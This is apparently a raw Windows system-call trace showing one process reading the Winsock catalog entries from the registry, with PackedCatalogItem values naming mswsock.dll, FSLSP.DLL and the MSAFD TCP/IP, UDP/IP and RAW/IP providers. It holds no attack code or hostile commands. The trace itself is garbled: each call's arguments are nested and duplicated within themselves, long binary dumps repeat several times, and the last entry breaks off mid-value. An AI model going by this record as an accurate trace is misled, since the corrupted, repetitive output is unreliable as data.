 03593   456   NtQueryValueKey  (472,  (472, "Next_Catalog_Entry_ID", Partial, 144, ... TitleIdx=0, Type=4, Data="\376\3\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (472, "Next_Catalog_Entry_ID", Partial, 144, ... TitleIdx=0, Type=4, Data="\376\3\0\0"}, 16, ) }, 16, ) == 0x0
 03594   456   NtQueryValueKey  (472,  (472, "Num_Catalog_Entries", Partial, 144, ... TitleIdx=0, Type=4, Data="\13\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (472, "Num_Catalog_Entries", Partial, 144, ... TitleIdx=0, Type=4, Data="\13\0\0\0"}, 16, ) }, 16, ) == 0x0
 03595   456   NtOpenKey  (0x2000000, {24, 472, 0x40, 0, 0,  (0x2000000, {24, 472, 0x40, 0, 0, "Catalog_Entries"}, ... 476, ) }, ... 476, ) == 0x0
 03596   456   NtOpenKey  (0x20019, {24, 476, 0x40, 0, 0,  (0x20019, {24, 476, 0x40, 0, 0, "000000000001"}, ... 480, ) }, ... 480, ) == 0x0
 03597   456   NtQueryValueKey  (480,  (480, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 03598   456   NtQueryValueKey  (480,  (480, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 03599   456   NtAllocateVirtualMemory  (-1, 1503232, 0, 4096, 4096, 4, ... 1503232, 4096, ) == 0x0
 03600   456   NtQueryValueKey  (480,  (480, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0gram\FSLSP.DLL\0\00\0\0\0\10\0\2\0\10\0\4\1\10\0h\220\354\28\220\354\2\2\0\12\0\4\1\12\00\00\0\0\0\10\0\2\0\14\0\4\1\10\0\210\220\354\2X\220\354\2\2\0\16\0\4\1\12\00\00\0\0\0\10\0\2\0\20\0\4\1\10\0\250\220\354\2x\220\354\2\2\0\22\0\4\1\12\00\00\0\0\0\10\0\2\0\24\0\4\1\10\0\310\220\354\2\230\220\354\2\2\0\26\0\4\1\12\00\00\0\0\0\10\0\2\0\30\0\4\1\10\0\0\0\0\0\270\220\354\2\2\0\32\0\4\1\10\0H\0K\0R\0\0\0\3\0\34\0\4\1\10\0\360\222\354\2\0\0\0\0\0\221\354\2\16\0\0\0<\0\37\0\4\0\10\0X\3\10\0X\3\10\0\4\0\2\0f\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\10\0\0\0\240\32\17\347\213\253\317\21\214\243\0\200_H\241\222\351\3\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\2\0\0\0\20\0\0\0\20\0\0\0\1\0\0\0\6\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0T\0c\0p\0i\0p\0 \0[\0T\0C\0P\0/\0I\0P\0]\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\204\3\0\0\21\16\0\0\304\1\0\0\310\1\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\340\1\0\0\21\16\0\0\304\1\0\0\310\1\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\22\16\0\0\304\1\0\0\310\1\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\334\1\0\0\374\342\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\20\347\26\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\02\0\22\16\0\0\304\1\0\0\310\1\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\340\1\0\0\23\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\26\0\2\0\0\0\220\0\0\0\23\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\24\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) , Partial, 900, ... TitleIdx=0, Type=3, Data= (480, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0gram\FSLSP.DLL\0\00\0\0\0\10\0\2\0\10\0\4\1\10\0h\220\354\28\220\354\2\2\0\12\0\4\1\12\00\00\0\0\0\10\0\2\0\14\0\4\1\10\0\210\220\354\2X\220\354\2\2\0\16\0\4\1\12\00\00\0\0\0\10\0\2\0\20\0\4\1\10\0\250\220\354\2x\220\354\2\2\0\22\0\4\1\12\00\00\0\0\0\10\0\2\0\24\0\4\1\10\0\310\220\354\2\230\220\354\2\2\0\26\0\4\1\12\00\00\0\0\0\10\0\2\0\30\0\4\1\10\0\0\0\0\0\270\220\354\2\2\0\32\0\4\1\10\0H\0K\0R\0\0\0\3\0\34\0\4\1\10\0\360\222\354\2\0\0\0\0\0\221\354\2\16\0\0\0<\0\37\0\4\0\10\0X\3\10\0X\3\10\0\4\0\2\0f\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\10\0\0\0\240\32\17\347\213\253\317\21\214\243\0\200_H\241\222\351\3\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\2\0\0\0\20\0\0\0\20\0\0\0\1\0\0\0\6\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0T\0c\0p\0i\0p\0 \0[\0T\0C\0P\0/\0I\0P\0]\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\204\3\0\0\21\16\0\0\304\1\0\0\310\1\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\340\1\0\0\21\16\0\0\304\1\0\0\310\1\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\22\16\0\0\304\1\0\0\310\1\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\334\1\0\0\374\342\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\20\347\26\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\02\0\22\16\0\0\304\1\0\0\310\1\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\340\1\0\0\23\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\26\0\2\0\0\0\220\0\0\0\23\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\24\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) \0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\26\0\2\0\0\0\220\0\0\0\23\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\24\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0 (480, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0gram\FSLSP.DLL\0\00\0\0\0\10\0\2\0\10\0\4\1\10\0h\220\354\28\220\354\2\2\0\12\0\4\1\12\00\00\0\0\0\10\0\2\0\14\0\4\1\10\0\210\220\354\2X\220\354\2\2\0\16\0\4\1\12\00\00\0\0\0\10\0\2\0\20\0\4\1\10\0\250\220\354\2x\220\354\2\2\0\22\0\4\1\12\00\00\0\0\0\10\0\2\0\24\0\4\1\10\0\310\220\354\2\230\220\354\2\2\0\26\0\4\1\12\00\00\0\0\0\10\0\2\0\30\0\4\1\10\0\0\0\0\0\270\220\354\2\2\0\32\0\4\1\10\0H\0K\0R\0\0\0\3\0\34\0\4\1\10\0\360\222\354\2\0\0\0\0\0\221\354\2\16\0\0\0<\0\37\0\4\0\10\0X\3\10\0X\3\10\0\4\0\2\0f\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\10\0\0\0\240\32\17\347\213\253\317\21\214\243\0\200_H\241\222\351\3\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\2\0\0\0\20\0\0\0\20\0\0\0\1\0\0\0\6\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0T\0c\0p\0i\0p\0 \0[\0T\0C\0P\0/\0I\0P\0]\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\204\3\0\0\21\16\0\0\304\1\0\0\310\1\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\340\1\0\0\21\16\0\0\304\1\0\0\310\1\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\22\16\0\0\304\1\0\0\310\1\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\334\1\0\0\374\342\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\20\347\26\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\02\0\22\16\0\0\304\1\0\0\310\1\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\340\1\0\0\23\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\26\0\2\0\0\0\220\0\0\0\23\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\24\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) }, 900, ) == 0x0
 03601   456   NtClose  (480, ... ) == 0x0
 03602   456   NtOpenKey  (0x20019, {24, 476, 0x40, 0, 0,  (0x20019, {24, 476, 0x40, 0, 0, "000000000002"}, ... 480, ) }, ... 480, ) == 0x0
 03603   456   NtQueryValueKey  (480,  (480, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 03604   456   NtQueryValueKey  (480,  (480, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 03605   456   NtQueryValueKey  (480,  (480, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0gram\FSLSP.DLL\0\00\0\0\0\10\0\2\0\10\0\4\1\10\0h\220\354\28\220\354\2\2\0\12\0\4\1\12\00\00\0\0\0\10\0\2\0\14\0\4\1\10\0\210\220\354\2X\220\354\2\2\0\16\0\4\1\12\00\00\0\0\0\10\0\2\0\20\0\4\1\10\0\250\220\354\2x\220\354\2\2\0\22\0\4\1\12\00\00\0\0\0\10\0\2\0\24\0\4\1\10\0\310\220\354\2\230\220\354\2\2\0\26\0\4\1\12\00\00\0\0\0\10\0\2\0\30\0\4\1\10\0\0\0\0\0\270\220\354\2\2\0\32\0\4\1\10\0H\0K\0R\0\0\0\3\0\34\0\4\1\10\0\360\222\354\2\0\0\0\0\0\221\354\2\16\0\0\0<\0\37\0\4\0\10\0X\3\10\0X\3\10\0\4\0\2\0\11\6\2\0\0\0\0\0\0\0\0\0\0\0\0\0\10\0\0\0\240\32\17\347\213\253\317\21\214\243\0\200_H\241\222\352\3\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\2\0\0\0\20\0\0\0\20\0\0\0\2\0\0\0\21\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\273\377\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0T\0c\0p\0i\0p\0 \0[\0U\0D\0P\0/\0I\0P\0]\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\204\3\0\0\26\16\0\0\304\1\0\0\310\1\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\340\1\0\0\26\16\0\0\304\1\0\0\310\1\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\27\16\0\0\304\1\0\0\310\1\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\334\1\0\0\374\342\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\20\347\26\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\03\0\27\16\0\0\304\1\0\0\310\1\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\340\1\0\0\30\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\26\0\2\0\0\0\220\0\0\0\30\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\31\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) , Partial, 900, ... TitleIdx=0, Type=3, Data= (480, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0gram\FSLSP.DLL\0\00\0\0\0\10\0\2\0\10\0\4\1\10\0h\220\354\28\220\354\2\2\0\12\0\4\1\12\00\00\0\0\0\10\0\2\0\14\0\4\1\10\0\210\220\354\2X\220\354\2\2\0\16\0\4\1\12\00\00\0\0\0\10\0\2\0\20\0\4\1\10\0\250\220\354\2x\220\354\2\2\0\22\0\4\1\12\00\00\0\0\0\10\0\2\0\24\0\4\1\10\0\310\220\354\2\230\220\354\2\2\0\26\0\4\1\12\00\00\0\0\0\10\0\2\0\30\0\4\1\10\0\0\0\0\0\270\220\354\2\2\0\32\0\4\1\10\0H\0K\0R\0\0\0\3\0\34\0\4\1\10\0\360\222\354\2\0\0\0\0\0\221\354\2\16\0\0\0<\0\37\0\4\0\10\0X\3\10\0X\3\10\0\4\0\2\0\11\6\2\0\0\0\0\0\0\0\0\0\0\0\0\0\10\0\0\0\240\32\17\347\213\253\317\21\214\243\0\200_H\241\222\352\3\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\2\0\0\0\20\0\0\0\20\0\0\0\2\0\0\0\21\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\273\377\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0T\0c\0p\0i\0p\0 \0[\0U\0D\0P\0/\0I\0P\0]\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\204\3\0\0\26\16\0\0\304\1\0\0\310\1\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\340\1\0\0\26\16\0\0\304\1\0\0\310\1\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\27\16\0\0\304\1\0\0\310\1\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\334\1\0\0\374\342\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\20\347\26\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\03\0\27\16\0\0\304\1\0\0\310\1\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\340\1\0\0\30\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\26\0\2\0\0\0\220\0\0\0\30\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\31\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) \0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\26\0\2\0\0\0\220\0\0\0\30\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\31\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0 (480, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0gram\FSLSP.DLL\0\00\0\0\0\10\0\2\0\10\0\4\1\10\0h\220\354\28\220\354\2\2\0\12\0\4\1\12\00\00\0\0\0\10\0\2\0\14\0\4\1\10\0\210\220\354\2X\220\354\2\2\0\16\0\4\1\12\00\00\0\0\0\10\0\2\0\20\0\4\1\10\0\250\220\354\2x\220\354\2\2\0\22\0\4\1\12\00\00\0\0\0\10\0\2\0\24\0\4\1\10\0\310\220\354\2\230\220\354\2\2\0\26\0\4\1\12\00\00\0\0\0\10\0\2\0\30\0\4\1\10\0\0\0\0\0\270\220\354\2\2\0\32\0\4\1\10\0H\0K\0R\0\0\0\3\0\34\0\4\1\10\0\360\222\354\2\0\0\0\0\0\221\354\2\16\0\0\0<\0\37\0\4\0\10\0X\3\10\0X\3\10\0\4\0\2\0\11\6\2\0\0\0\0\0\0\0\0\0\0\0\0\0\10\0\0\0\240\32\17\347\213\253\317\21\214\243\0\200_H\241\222\352\3\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\2\0\0\0\20\0\0\0\20\0\0\0\2\0\0\0\21\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\273\377\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0T\0c\0p\0i\0p\0 \0[\0U\0D\0P\0/\0I\0P\0]\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\204\3\0\0\26\16\0\0\304\1\0\0\310\1\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\340\1\0\0\26\16\0\0\304\1\0\0\310\1\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\27\16\0\0\304\1\0\0\310\1\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\334\1\0\0\374\342\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\20\347\26\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\03\0\27\16\0\0\304\1\0\0\310\1\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\340\1\0\0\30\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\26\0\2\0\0\0\220\0\0\0\30\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\31\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) }, 900, ) == 0x0
 03606   456   NtClose  (480, ... ) == 0x0
 03607   456   NtOpenKey  (0x20019, {24, 476, 0x40, 0, 0,  (0x20019, {24, 476, 0x40, 0, 0, "000000000003"}, ... 480, ) }, ... 480, ) == 0x0
 03608   456   NtQueryValueKey  (480,  (480, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 03609   456   NtQueryValueKey  (480,  (480, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 03610   456   NtQueryValueKey  (480,  (480, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0gram\FSLSP.DLL\0\00\0\0\0\10\0\2\0\10\0\4\1\10\0h\220\354\28\220\354\2\2\0\12\0\4\1\12\00\00\0\0\0\10\0\2\0\14\0\4\1\10\0\210\220\354\2X\220\354\2\2\0\16\0\4\1\12\00\00\0\0\0\10\0\2\0\20\0\4\1\10\0\250\220\354\2x\220\354\2\2\0\22\0\4\1\12\00\00\0\0\0\10\0\2\0\24\0\4\1\10\0\310\220\354\2\230\220\354\2\2\0\26\0\4\1\12\00\00\0\0\0\10\0\2\0\30\0\4\1\10\0\0\0\0\0\270\220\354\2\2\0\32\0\4\1\10\0H\0K\0R\0\0\0\3\0\34\0\4\1\10\0\360\222\354\2\0\0\0\0\0\221\354\2\16\0\0\0<\0\37\0\4\0\10\0X\3\10\0X\3\10\0\4\0\2\0\11\6\2\0\0\0\0\0\0\0\0\0\0\0\0\0\14\0\0\0\240\32\17\347\213\253\317\21\214\243\0\200_H\241\222\353\3\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\2\0\0\0\20\0\0\0\20\0\0\0\3\0\0\0\0\0\0\0\377\0\0\0\0\0\0\0\0\0\0\0\273\377\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0T\0c\0p\0i\0p\0 \0[\0R\0A\0W\0/\0I\0P\0]\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\204\3\0\0\33\16\0\0\304\1\0\0\310\1\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\340\1\0\0\33\16\0\0\304\1\0\0\310\1\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\34\16\0\0\304\1\0\0\310\1\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\334\1\0\0\374\342\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\20\347\26\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\04\0\34\16\0\0\304\1\0\0\310\1\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\340\1\0\0\35\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\26\0\2\0\0\0\220\0\0\0\35\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\36\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) , Partial, 900, ... TitleIdx=0, Type=3, Data= (480, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0gram\FSLSP.DLL\0\00\0\0\0\10\0\2\0\10\0\4\1\10\0h\220\354\28\220\354\2\2\0\12\0\4\1\12\00\00\0\0\0\10\0\2\0\14\0\4\1\10\0\210\220\354\2X\220\354\2\2\0\16\0\4\1\12\00\00\0\0\0\10\0\2\0\20\0\4\1\10\0\250\220\354\2x\220\354\2\2\0\22\0\4\1\12\00\00\0\0\0\10\0\2\0\24\0\4\1\10\0\310\220\354\2\230\220\354\2\2\0\26\0\4\1\12\00\00\0\0\0\10\0\2\0\30\0\4\1\10\0\0\0\0\0\270\220\354\2\2\0\32\0\4\1\10\0H\0K\0R\0\0\0\3\0\34\0\4\1\10\0\360\222\354\2\0\0\0\0\0\221\354\2\16\0\0\0<\0\37\0\4\0\10\0X\3\10\0X\3\10\0\4\0\2\0\11\6\2\0\0\0\0\0\0\0\0\0\0\0\0\0\14\0\0\0\240\32\17\347\213\253\317\21\214\243\0\200_H\241\222\353\3\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\2\0\0\0\20\0\0\0\20\0\0\0\3\0\0\0\0\0\0\0\377\0\0\0\0\0\0\0\0\0\0\0\273\377\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0T\0c\0p\0i\0p\0 \0[\0R\0A\0W\0/\0I\0P\0]\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\204\3\0\0\33\16\0\0\304\1\0\0\310\1\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\340\1\0\0\33\16\0\0\304\1\0\0\310\1\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\34\16\0\0\304\1\0\0\310\1\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\334\1\0\0\374\342\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\20\347\26\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\04\0\34\16\0\0\304\1\0\0\310\1\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\340\1\0\0\35\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\26\0\2\0\0\0\220\0\0\0\35\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\36\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0